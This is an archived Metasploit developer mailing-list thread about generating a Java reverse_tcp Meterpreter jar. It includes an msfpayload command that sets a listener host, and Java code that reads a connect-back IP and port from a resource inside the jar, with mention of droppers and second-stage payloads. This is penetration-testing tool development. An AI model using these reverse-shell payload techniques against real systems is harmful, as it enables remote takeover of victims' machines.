Re: Using msfpayload to create a reverse java meterpreter

[egypt () metasploit com]

That should make things a lot easier.  We could put an exe in there to
create a dropper or, as you suggest, a file with an IP to connect back
to for a second-stage java payload.  Doing it this way means we can
create a single class file that can easily be used to execute any
other kind of payload or stage.  The only downside I see is that it
will invalidate signed jars, but that problem is also present if we
directly modify a string in the .class files.

Thanks,
egypt

On Mon, Aug 16, 2010 at 6:26 PM, scriptjunkie
<scriptjunkie1 () googlemail com> wrote:
> Well, this is late, but I would use resources. Java can access files
> within the .jar by using something like this:
> InputStream is =
> getClass().getClassLoader().getResourceAsStream("info.txt") which will
> retrieve a stream to the file info.txt in the root of the jar file.
> (of course a jar file is just a renamed .zip) So if we can edit a file
> and zip up a folder, we can create a custom jar payload. For example,
> see attached jar, with source as follows:
>
> public class Main {
>    public static void main(String[] args) throws Exception {
>                Main main = new Main();
>    }
>        public Main() throws Exception{
>        java.io.BufferedReader br = new java.io.BufferedReader(new
> java.io.InputStreamReader(
>                                getClass().getClassLoader().getResourceAsStream("info.txt")));
>                String ipPort = br.readLine();
>                javax.swing.JOptionPane.showMessageDialog(null, ipPort);
>        }
> }
>
> Do we have any code that zips up a folder?
>
> On Thu, Aug 12, 2010 at 2:41 PM,  <egypt () metasploit com> wrote:
> > Not yet.  Right now you can take data/java/loader.jar and run it with
> > "java -jar loader.jar <lhost> <lport>" to achieve your goal, but we
> > haven't worked out the details of dynamically building stagers without
> > requiring a JDK.  If anyone on the list has a strong understanding of
> > java bytecode and would like to take a look at modifying the jar in
> > ruby, or if anyone has a better idea for creating self-contained
> > stagers, please get in touch.
> >
> > egypt
> >
> > 2010/7/30 Shai rod <shai_r () msn com>:
> > > Hi all,
> > > I was wondering, if its possible to create a "java/meterpreter/reverse_tcp"
> > > jar file using msfpayload ?
> > > I have tried to create one as follows:
> > > msfpayload java/meterpreter/reverse_tcp LHOST=192.168.1.116 R > payload.jar
> > > when i try to execute it i get :
> > > # java -jar payload.jar
> > > Invalid or corrupt jarfile pay.jar
> > > Thank you in advance,
> > > Shai.
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework
>
>
>
> --
> scriptjunkie
> https://scriptjunkie1.wordpress.com/
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework